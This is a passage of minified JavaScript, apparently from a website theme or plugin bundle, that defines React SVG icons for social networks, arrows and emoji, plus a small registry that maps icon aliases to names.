3.88 0 0 1-2.678-.468 27.868 27.868 0 0 0-37.106 9.469 27.009 27.009 0 0 0-.722 27.349 2.2 2.2 0 0 1 .268 1.577c-4.109 21.989 7.627 42.639 27.735 51.084a48.685 48.685 0 0 0 26.784 3.2 3.168 3.168 0 0 1 2.058.3 28.253 28.253 0 0 0 14.99 3.392 24.78 24.78 0 0 0 10.7-3.344 28.036 28.036 0 0 0 13.784-19.714 26.476 26.476 0 0 0-2.054-15.057Zm-22.9 2.118c-1.145 6.065-5.1 9.919-10.639 12.005a34.579 34.579 0 0 1-25.014.047 17.5 17.5 0 0 1-10.124-9.767 10.7 10.7 0 0 1-.823-3.5 4.786 4.786 0 0 1 2.69-4.8 5.42 5.42 0 0 1 5.954.641 8.434 8.434 0 0 1 1.858 2.609c.575 1.166 1.117 2.344 1.763 3.477a10.145 10.145 0 0 0 8.116 5.239c3.849.439 7.6.181 11.051-1.866 3.034-1.8 4.327-4.8 3.344-7.958a6.789 6.789 0 0 0-3.821-3.96 36.8 36.8 0 0 0-8.484-2.527c-4.659-1.075-9.32-2.134-13.636-4.306-6.146-3.093-8.925-8.983-7.25-15.629a12.974 12.974 0 0 1 5.917-7.83 26.362 26.362 0 0 1 12.494-3.723c1.1-.089 2.212-.11 2.953-.145 5.344.04 10.179.739 14.54 3.347 3.038 1.816 5.483 4.183 6.521 7.712a5.465 5.465 0 0 1-1.221 5.8 5.212 5.212 0 0 1-8.142-.932c-.8-1.185-1.506-2.436-2.312-3.618a9.062 9.062 0 0 0-6.6-4.222c-3.583-.437-7.092-.415-10.344 1.435a5.654 5.654 0 0 0-3.072 3.721c-.446 2.16.408 3.849 2.36 5.136 2.449 1.616 5.253 2.209 8.032 2.887a123.979 123.979 0 0 1 12.525 3.358 19.776 19.776 0 0 1 8.3 4.956c3.252 3.573 3.917 7.862 3.06 12.414Z"})),(0,o.createElement)("svg",{viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M9.34084 11.3521L7.66481 13.0281C6.36891 14.324 4.26783 14.324 2.97193 13.0281C1.67602 11.7322 1.67602 9.63111 2.97193 8.33521L4.64796 6.65918M6.65916 4.64795L8.33519 2.97193C9.63109 1.67603 11.7322 1.67602 13.0281 2.97192C14.324 4.26782 14.324 6.36889 13.0281 7.66479L11.352 9.34082",stroke:"currentColor",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M6.33398 9.66665L9.66732 6.33331",stroke:"currentColor",strokeLinecap:"round"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{fill:"currentColor",d:"M50 4.4v41.1c0 2.5-2 4.4-4.4 4.4H34.5V31.1c0-.4.1-.6.5-.5h5.4c.4 0 .6 0 .6-.5.3-2.3.6-4.6.9-7 0-.4-.1-.4-.4-.4h-6.6c-.3 0-.5-.1-.5-.4v-4.8c-.1-1.5 1-2.9 2.6-3H41.6c.3 0 .4-.1.4-.4V7.9c0-.4-.1-.4-.5-.4-1.5 0-6.7 0-7.8.2-4 .7-6.9 4-7.2 8.1-.1 2.2 0 4.4 0 6.6 0 .5-.1.6-.6.6h-5.5c-.3 0-.4.1-.4.4v7c0 .3.1.4.4.4h5.5c.5 0 .6.1.6.6v18.8H4.4C2 50 0 48 0 45.5V4.4C0 2 2 0 4.4 0h41.1C48 0 50 2 50 4.4z"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 35.699 50"},(0,o.createElement)("path",{d:"M27.638 5.514A13.716 13.716 0 0 1 26.162 0h-6.835v28.914a6.244 6.244 0 1 1-6.241-6.247 6.086 6.086 0 0 1 1.965.32v-7.002a12.836 12.836 0 0 0-1.965-.149A13.082 13.082 0 1 0 26.16 28.918V14.134a17.847 17.847 0 0 0 10.454 3.277l.162-6.834c-4.405-.105-7.4-1.761-9.14-5.063"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m11.606 21.714a11.347 11.347 0 0 1-6.656-2.086v9.413a8.323 8.323 0 1 1-7.076-8.236v4.461a3.9 3.9 0 0 0-1.251-.2 3.978 3.978 0 1 0 3.974 3.977V10.628h4.353a8.761 8.761 0 0 0 .94 3.514c1.112 2.1 3.015 3.156 5.821 3.223Z"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M30.889 22a8.883 8.883 0 0 1-8.976 8.888A8.932 8.932 0 1 1 30.889 22"}),(0,o.createElement)("path",{d:"M22 0C1.18 0 0 1.179 0 22s1.18 22 22 22 22-1.179 22-22S42.821 0 22 0m0 35.816A13.818 13.818 0 1 1 35.816 22 13.817 13.817 0 0 1 22 35.816m14.362-24.948a3.194 3.194 0 0 1-3.256-3.256 3.248 3.248 0 0 1 3.256-3.256 3.175 3.175 0 0 1 3.168 3.256 3.123 3.123 0 0 1-3.168 3.256"}))),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("path",{d:"M37.53 0H4.47A4.468 4.468 0 0 0 0 4.47v33.06A4.468 4.468 0 0 0 4.47 42h33.06A4.468 4.468 0 0 0 42 37.53V4.47A4.468 4.468 0 0 0 37.53 0M12.49 35.12c0 .51-.09.59-.59.59H6.87c-.5 0-.59-.17-.59-.59V16.43c0-.5.09-.67.67-.67h5.03c.42 0 .59.08.59.59-.08 6.28-.08 12.49-.08 18.77m-3.1-22.04a3.583 3.583 0 0 1-3.61-3.61 3.626 3.626 0 0 1 3.61-3.6 3.572 3.572 0 0 1 3.6 3.6 3.692 3.692 0 0 1-3.6 3.61m25.65 22.63h-4.78c-.5 0-.75-.08-.75-.67v-9.3a13.485 13.485 0 0 0-.26-2.6 2.664 2.664 0 0 0-2.43-2.35 3.264 3.264 0 0 0-3.69 1.68 6.537 6.537 0 0 0-.58 2.51v9.98c0 .67-.17.84-.84.75-1.59-.08-3.19 0-4.78 0-.42 0-.59-.17-.59-.59V16.35c0-.42.09-.59.51-.59h4.86c.42 0 .5.17.5.5v2.1a7.617 7.617 0 0 1 3.69-2.77 8.813 8.813 0 0 1 6.2.51 5.948 5.948 0 0 1 3.11 4.44 20.4 20.4 0 0 1 .42 3.94v10.56c.08.59-.09.67-.59.67"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44.26"},(0,o.createElement)("path",{d:"M22.311 0A21.555 21.555 0 0 0 .798 21.6a22.259 22.259 0 0 0 3.01 11.067l-3.807 11.6 11.951-3.805A21.656 21.656 0 0 0 44 21.517 21.687 21.687 0 0 0 22.311 0m10.637 29.915a5.156 5.156 0 0 1-3.487 2.414c-4.559.983-9.387-2.593-12.338-5.633a22.894 22.894 0 0 1-5.275-8.046c-.983-2.861.358-8.583 4.381-7.689.984.179 1.163 1.073 1.431 1.878.447 1.162.8 2.235 1.251 3.4a1.514 1.514 0 0 1 0 .894c-.357.805-1.162 1.341-1.7 2.056-.805 1.252 2.324 4.292 3.218 5.1 1.163 1.072 2.951 2.682 4.56 2.861.894.089 2.056-1.7 2.5-2.325.358-.447.626-.536 1.073-.358 1.52.626 2.951 1.52 4.47 2.325a.811.811 0 0 1 .537.983 3.565 3.565 0 0 1-.626 2.146"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0M2.724 24a21.149 21.149 0 0 1 1.844-8.657L14.716 43.15A21.283 21.283 0 0 1 2.724 24M24 45.278a21.317 21.317 0 0 1-6.01-.865l6.384-18.55 6.538 17.917a1.806 1.806 0 0 0 .154.293 21.224 21.224 0 0 1-7.066 1.2m2.931-31.249c1.282-.065 2.436-.2 2.436-.2a.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-2.09 0-5.6-.272-5.6-.272a.88.88 0 0 0-.133 1.754s1.084.136 2.23.2l3.317 9.084-4.657 13.963-7.754-23.047a42.05 42.05 0 0 0 2.436-.2.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-.4 0-.871-.009-1.371-.025a21.273 21.273 0 0 1 32.144-4.006c-.093-.006-.182-.015-.275-.015a3.682 3.682 0 0 0-3.573 3.774c0 1.754 1.01 3.237 2.091 4.991a11.211 11.211 0 0 1 1.754 5.869 24.615 24.615 0 0 1-1.547 7.014l-2.2 6.952Zm7.764 28.366 6.5-18.788a20.025 20.025 0 0 0 1.618-7.62 16.1 16.1 0 0 0-.142-2.189 21.276 21.276 0 0 1-7.974 28.6"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M4 23.999a20 20 0 0 0 11.272 18L5.732 15.86A19.923 19.923 0 0 0 4 24m33.5-1.009a10.531 10.531 0 0 0-1.646-5.517c-1.014-1.648-1.964-3.042-1.964-4.69a3.463 3.463 0 0 1 3.358-3.55c.089 0 .173.011.259.016A20 20 0 0 0 7.29 13.013c.47.015.912.025 1.288.025 2.091 0 5.33-.254 5.33-.254a.827.827 0 0 1 .128 1.648s-1.084.127-2.289.19l7.283 21.664 4.378-13.127-3.117-8.535c-1.078-.063-2.1-.19-2.1-.19a.827.827 0 0 1 .127-1.648s3.3.254 5.267.254c2.092 0 5.331-.254 5.331-.254a.827.827 0 0 1 .128 1.648s-1.085.127-2.289.19l7.228 21.5 2.063-6.538a23.047 23.047 0 0 0 1.454-6.593m-13.146 2.755-6 17.437a20.006 20.006 0 0 0 12.292-.319 1.835 1.835 0 0 1-.143-.276Zm17.2-11.344a15.342 15.342 0 0 1 .134 2.057 18.884 18.884 0 0 1-1.524 7.163l-6.11 17.661a20 20 0 0 0 7.5-26.881"}),(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m0 46.56A22.56 22.56 0 1 1 46.56 24 22.559 22.559 0 0 1 24 46.56"}))),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 33.86"},(0,o.createElement)("path",{d:"M47.134 5.29a5.893 5.893 0 0 0-4.232-4.232C39.055 0 24.05 0 24.05 0S9.044 0 5.293.962A6.146 6.146 0 0 0 .965 5.29C.003 9.041.003 16.929.003 16.929s0 7.887.962 11.638A5.894 5.894 0 0 0 5.197 32.8c3.847 1.058 18.853 1.058 18.853 1.058s15.005 0 18.756-1.058a6.059 6.059 0 0 0 4.232-4.233C48 24.816 48 16.929 48 16.929s.1-7.888-.866-11.639M19.141 21.928v-10a1.237 1.237 0 0 1 1.845-1.077l8.85 5a1.237 1.237 0 0 1 0 2.153l-8.85 5a1.237 1.237 0 0 1-1.845-1.077"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M48.004 23.995a24 24 0 0 1-24 24.005 23.735 23.735 0 0 1-10.948-2.65h.086a15.084 15.084 0 0 0 4.8-6.914 35.685 35.685 0 0 0 1.729-7.009v-.192c.1-.384.192-.384.48-.192.1 0 .1.1.192.1a7.385 7.385 0 0 0 4.322 2.112 11.879 11.879 0 0 0 7.491-.96 16.739 16.739 0 0 0 4.513-3.649 11.277 11.277 0 0 0 1-1.354 17.413 17.413 0 0 0 2.574-7.278 16.381 16.381 0 0 0-1.1-8.555 13.1 13.1 0 0 0-4.774-5.569 17.523 17.523 0 0 0-8.067-2.977A20.935 20.935 0 0 0 15.45 4.065a15.91 15.91 0 0 0-9.028 8.258 11.865 11.865 0 0 0-.288 9.89 8.5 8.5 0 0 0 5.859 4.993c.288.1.384 0 .384-.288.192-1.056.384-2.112.576-3.073 0-.192 0-.384-.192-.48a8.869 8.869 0 0 1-1.825-2.688 6.966 6.966 0 0 1 .1-5.377 12.226 12.226 0 0 1 7.875-7.778 14.92 14.92 0 0 1 7.4-.672c5.475.912 7.914 6.625 7.559 11.685a15.147 15.147 0 0 1-2.757 7.423 7.589 7.589 0 0 1-4.129 2.976 5.108 5.108 0 0 1-4.226-.768 2.864 2.864 0 0 1-1.153-2.3 9.668 9.668 0 0 1 .769-3.745c.48-1.44 1.056-2.785 1.44-4.225a10.787 10.787 0 0 0 .384-3.072 3.408 3.408 0 0 0-4.206-2.977 5.336 5.336 0 0 0-2.641 1.364c-1.892 1.785-2.4 5.175-1.6 7.566a7.772 7.772 0 0 1-.1 4.9c-.864 2.976-1.825 6.049-2.5 9.122a28.284 28.284 0 0 0-.672 7.489 8.268 8.268 0 0 0 .576 3.063 24 24 0 1 1 34.949-21.356"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.85 48"},(0,o.createElement)("path",{d:"M44.492 25.179a6.625 6.625 0 0 0 .192-7.766 6.482 6.482 0 0 0-9.492-1.151c-.192.1-.288.192-.384.1a28.339 28.339 0 0 0-9.684-2.493c-.192 0-.287-.095-.192-.287.288-.959.672-1.822 1.055-2.781a29.239 29.239 0 0 1 3.068-5.657 7.62 7.62 0 0 1 2.017-1.919 2.338 2.338 0 0 1 2.493 0 6.138 6.138 0 0 1 1.246.959c.192.191.192.287.192.575a3.868 3.868 0 0 0 3.26 4.506 3.786 3.786 0 0 0 4.309-3.739 3.8 3.8 0 0 0-5.463-3.547.358.358 0 0 1-.479-.1 4.481 4.481 0 0 0-1.151-.863 5.486 5.486 0 0 0-6.232-.1 14.609 14.609 0 0 0-3.26 3.643 38.376 38.376 0 0 0-4.123 9.013c-.1.287-.192.383-.479.383a26.861 26.861 0 0 0-10.163 2.493c-.192.1-.288.1-.48-.1a6.631 6.631 0 0 0-8.054-.383 6.539 6.539 0 0 0-1.246 9.4c.192.192.192.288.1.479a13.425 13.425 0 0 0-.959 3.74 14.384 14.384 0 0 0 2.3 8.821 20.414 20.414 0 0 0 7.191 6.519 27.739 27.739 0 0 0 12.752 3.069 27.311 27.311 0 0 0 12.464-2.781 19.211 19.211 0 0 0 7.282-5.933c3.068-4.219 3.835-8.725 1.822-13.615a.865.865 0 0 1 .1-.48m-12.656 5.421a3.645 3.645 0 1 1 3.024-3.023 3.646 3.646 0 0 1-3.024 3.023m-.192 8.1a14.556 14.556 0 0 1-9.013 3.26 14.886 14.886 0 0 1-8.533-3.164 1.469 1.469 0 1 1 1.822-2.3 11.081 11.081 0 0 0 7.862 2.493 11.805 11.805 0 0 0 5.369-2.014c.288-.191.479-.383.767-.575a1.488 1.488 0 0 1 2.014.288 1.6 1.6 0 0 1-.288 2.013m-16.683-15.34a3.646 3.646 0 1 1-3.644 3.643 3.526 3.526 0 0 1 3.644-3.643m-12.464.767a4.959 4.959 0 0 1 7.095-6.808 18.573 18.573 0 0 0-7.095 6.808m41.036-.288a18.259 18.259 0 0 0-6.807-6.424c-.1-.1-.192-.1-.288-.192a5.75 5.75 0 0 1 2.4-.959 4.811 4.811 0 0 1 4.794 2.206 4.978 4.978 0 0 1 .1 5.273c0 .1-.1.384-.192.1"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,o.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"}));const n=new class{constructor(){this.icons=new Map,this.aliases=new Map}initializeIcons(e){Object.entries(e).forEach((([e,t])=>{this.icons.set(e,t)}))}storeAliases(e){Object.entries(e).forEach((([e,t])=>{this.icons.has(t)&&this.aliases.set(e,this.icons.get(t))}))}getAliases(){return Object.fromEntries(this.aliases)}toObject(){return{...Object.fromEntries(this.icons),...Object.fromEntries(this.aliases)}}toCurrentIconObj(){return{...Object.fromEntries(this.icons)}}};n.initializeIcons({...i.c,...a.e}),n.storeAliases({angle_bottom_left_line:"arrow_down_bottom_left_solid",angle_bottom_right_line:"arrow_down_bottom_right_solid",angle_top_left_line:"arrow_up_top_left_solid",angle_top_right_line:"arrow_up_top_right_solid",rightFillAngle:"right_triangle_angle_play_arrow_forward_solid",leftAngle2:"arrow_left_previous_backward_chevron_line",rightAngle2:"arrow_right_next_forward_chevron_line",collapse_bottom_line:"arrow_down_dropdown_maximize_chevron_line",arrowUp2:"arrow_up_dropdown_minimize_chevron_line",longArrowUp2:"long_arrow_up_top_increase_solid",arrow_left_circle_line:"arrow_left_backward_circle_line",arrow_bottom_circle_line:"arrow_down_bottom_downward_circle_line",arrow_right_circle_line:"arrow_right_forward_circle_line",arrow_top_circle_line:"arrow_up_top_upward_circle_line",close_circle_line:"cross_close_x_minimize_circle_line",close_line:"cross_x_close_minimize_line",arrow_down_line:"arrow_down_bottom_downward_line",leftArrowLg:"arrow_left_backward_line",rightArrowLg:"arrow_left_forward_line",arrow_up_line:"long_arrow_up_top_increase_line",down_solid:"arrow_down_bottom_downward_circle_solid",right_solid:"arrow_right_forward_circle_solid",left_solid:"arrow_left_backward_circle_solid",up_solid:"arrow_up_top_upward_circle_solid",wrong_solid:"cross_close_x_minimize_circle_solid",bottom_right_line:"arrow_move_up_right_line",bottom_left_line:"arrow_move_up_left_line",top_left_angle_line:"arrow_move_down_left_line",top_right_line:"arrow_move_down_right_line",at_line:"at_a_mail_line",refresh:"refresh_reset_cycle_loop_infinity_line",cart_line:"shopping_cart_line",cart_solid:"add_plus_shopping_cart_solid",cog_line:"settings_tool_function_line",cog_solid:"settings_tool_function_solid",correct_solid:"right_circle_solid",dot_solid:"dot_circle_solid",clock:"clock_reading_time_1_line.svg",book:"book_line",download_line:"download_1_line",download_solid:"download_1_solid",downlod_bottom_solid:"download_1_solid",eye:"view_count_show_visible_eye_open_2_line",hidden_line:"hidden_hide_invisible_line",home_line:"home_house_line",home_solid:"home_house_solid",location_line:"location_gps_map_line",location_solid:"location_gps_map_solid",love_line:"heart_love_wishlist_favourite_line",love_solid:"heart_love_wishlist_favourite_solid",notice_circle_solid:"warning_circle_solid",notice_solid:"warning_triangle_solid",play_line:"play_media_video_circle_line",plus2:"",videoplay:"right_triangle_angle_play_arrow_forward_solid",left_angle_solid:"left_triangle_angle_arrow_backward_solid",caretArrow:"caret_up_top_triangle_angle_arrow_upward_solid",rectangle_solid:"square_rounded_solid",restriction_line:"restriction_no_stop_line",right_circle_line:"correct_save_check_circle_line",save_line:"correct_save_check_line",search_line:"search_magnify_line",search_solid:"search_magnify_solid",triangle_solid:"triangle_shape_solid",warning_circle_line:"warning_circle_line",warning_triangle_line:"warning_triangle_line",upload_solid:"upload_1_solid",cat1:"category_file_documents_1_solid",cat2:"category_book_line",cat3:"category_file_documents_2_line",cat4:"category_file_documents_3_line",cat5:"category_file_documents_3_solid",cat6:"category_file_documents_4_line",cat7:"category_book_line",commentCount1:"messege_comment_1_line",commentCount2:"messege_comment_3_solid",commentCount3:"messege_comment_3_line",commentCount4:"messege_comment_6_line",commentCount5:"messege_comment_7_line",commentCount6:"messege_comment_8_line",comment:"messege_comment_4_line",date1:"calendar_date_4_line",date2:"calendar_date_1_solid",date3:"calendar_date_2_line",date4:"calendar_date_4_solid",date5:"calendar_date_3_line",calendar:"calendar_date_3_line",readingTime1:"clock_reading_time_3_line",readingTime2:"clock_reading_time_2_line",readingTime3:"book_reading_time_line",readingTime4:"clock_reading_time_1_line",readingTime5:"hourglass_timer_time_line",tag1:"tag_bookmark_save_favourite_mark_discount_sale_line",tag2:"price_tag_label_category_sale_discount_solid",tag3:"price_tag_label_category_sale_discount_line",tag4:"price_tag_offer_sale_coupon_solid",tag5:"price_tag_label_category_sale_discount_line",tag6:"growth_increase_up_solid",viewCount1:"view_count_show_visible_eye_open_1_line",viewCount2:"view_count_show_visible_eye_open_2_line",viewCount3:"view_count_show_visible_eye_open_3_line",viewCount4:"view_count_show_visible_eye_open_4_solid",viewCount5:"view_count_show_visible_eye_open_5_solid",viewCount6:"view_count_show_visible_eye_open_5_solid",author1:"author_user_human_1_line",author2:"author_user_human_4_line",author3:"author_user_human_4_solid",author4:"author_user_human_4_line",author5:"author_user_human_3_solid",user:"author_user_human_3_line",desktop:"desktop_monitor_computer_line",laptop:"laptop_computer_line",tablet:"tablet_ipad_pad_line",mobile:"mobile_smartphone_phone_line",angry_line:"angry_emoji_line",angry_solid:"angry_emoji_solid",confused_line:"confused_emoji_line",confused_solid:"confused_emoji_solid",happy_line:"happy_emoji_line",happy_solid:"happy_emoji_solid",smile_line:"smile_emoji_line",smile_solid:"smile_emoji_solid",share_line:"social_community_line",share:"share_social_solid",apple_solid:"apple_logo_icon_solid",android_solid:"android_logo_icon_solid",google_solid:"google_logo_icon_solid",messenger:"messenger_logo_icon_solid",microsoft_solid:"microsoft_logo_icon_solid",mail:"mail_email_messege_solid",media_document:"media_document",facebook:"facebook_logo_icon_solid",twitter:"twitter_x_logo_icon_line",arrowDown2:"arrow_down_dropdown_maximize_chevron_line",setting:"settings_tool_function_solid",right_circle_solid:"correct_save_check_circle_solid",full_screen:"full_screen_corners_out_solid",zoom_in:"zoom_in_magnifying_glass_plus_line",zoom_out:"zoom_out_magnifying_glass_minus_line",gallery_indicator:"gallery_indicator_image_solid",ascending:"sort_ascending_order_line",descending:"sort_descending_order_line",unlink:"unlink_link_break_line",rocket:"rocket_fly_boost_launch_pro_solid",unlock:"unlocked_open_security_solid",connect:"plugin_connect_socket_integration_line",leftAngle:"arrow_left_previous_backward_chevron_line",rightAngle:"right_triangle_angle_play_arrow_forward_line",link:"link_chains_line",subtract:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),skype:"skype_logo_icon_solid",updated_link:"link_chains_line",tiktok_lite_solid:"tiktok_logo_icon_circle_line",tiktok_solid:"tiktok_logo_icon_solid",instagram_solid:"instagram_logo_icon_solid",linkedin:"linkedin_logo_icon_solid",whatsapp:"whatsapp_logo_icon_solid",wordpress_lite_solid:"wordpress_logo_icon_solid",wordpress_solid:"wordpress_logo_icon_2_solid",youtube_solid:"youtube_logo_icon_solid",pinterest:"pinterest_logo_icon_solid",reddit:"reddit_logo_icon_solid",five_star_line:"star_rating_line",rightAngleBold:"arrow_right_next_forward_chevron_line",leftAngleBold:"arrow_left_previous_backward_chevron_line",reset_left_line:"refresh_reset_cycle_loop_infinity_line",hamicon_1:"hamicon_1_line",hamicon_2:"hemicon_2_line",hamicon_3:"hemicon_3_line",hamicon_4:"hamicon_5_line",hamicon_5:"hemicon_2_solid",hamicon_6:"hamicon_6_line"});const r=n.toObject(),s={subtract:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),skype:r.skype_logo_icon_solid,updated_link:r.link_chains_line,facebook:r.facebook_logo_icon_solid,twitter:r.twitter_x_logo_icon_line,tiktok_lite_solid:r.tiktok_logo_icon_circle_line,tiktok_solid:r.tiktok_logo_icon_solid,instagram_solid:r.instagram_logo_icon_solid,linkedin:r.linkedin_logo_icon_solid,whatsapp:r.whatsapp_logo_icon_solid,wordpress_lite_solid:r.wordpress_logo_icon_solid,wordpress_solid:r.wordpress_logo_icon_2_solid,youtube_solid:r.youtube_logo_icon_solid,pinterest:r.pinterest_logo_icon_solid,reddit:r.reddit_logo_icon_solid,google_solid:r.google_logo_icon_solid,link:r.link_chains_line,share:r.share_social_solid},p=n.toCurrentIconObj(),c=r},71900:(e,t,l)=>{"use strict";l.d(t,{e:()=>a});var o=l(67294);const a={add_plus_shopping_cart_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M13.745 7.5v4M11.75 9.505h4"})),android_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.5 9.5a5.5 5.5 0 1 1 11 0V17a2 2 0 0 1-2 2h-7a2 2 0 0 1-2-2V9.5ZM20 11v6M4 11v6"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m14 4 1.5-2M10 4 8.5 2m-2 8.5h11m-8 8.5v3m5.5-3v3M10.49 8h.01m2.99 0h.01"})),angry_emoji_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 9.5c1 0 2.69.254 2.964 1.231m0 0A.988.988 0 0 1 10 11c0 1.5-2.072-.037-.036-.269ZM17 9.5c-1 0-2.69.254-2.964 1.231m0 0A.99.99 0 0 0 14 11c0 1.5 2.072-.037.036-.269Z"}),(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 17c1.5-3 6.5-3 8 0"})),apple_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.489 8.963c-.114.089-2.127 1.23-2.127 3.768 0 2.936 2.561 3.975 2.638 4-.012.064-.407 1.423-1.35 2.808-.841 1.219-1.72 2.435-3.056 2.435-1.337 0-1.68-.781-3.223-.781-1.504 0-2.039.807-3.261.807-1.223 0-2.075-1.128-3.056-2.512C4.918 17.86 4 15.335 4 12.938 4 9.09 6.484 7.05 8.93 7.05c1.298 0 2.381.859 3.197.859.776 0 1.987-.91 3.465-.91.56 0 2.572.051 3.897 1.963ZM14.59 4.415c.533-.64.91-1.527.91-2.415 0-.123-.01-.248-.033-.349-.867.033-1.9.585-2.522 1.315-.489.561-.945 1.45-.945 2.349 0 .135.022.27.033.314.055.01.144.022.233.022.778 0 1.758-.527 2.323-1.236Z"})),arrow_down_bottom_downward_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 13 12 16.5m0 0L8.5 13m3.5 3.5v-9"})),arrow_down_bottom_downward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.5 12 8.5 8.5m0 0 8.5-8.5M12 20.5v-17"})),arrow_down_bottom_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 6v12m0 0h12M6 18 18 6"})),arrow_down_bottom_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 6v12m0 0H6m12 0L6 6"})),arrow_down_dropdown_maximize_chevron_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 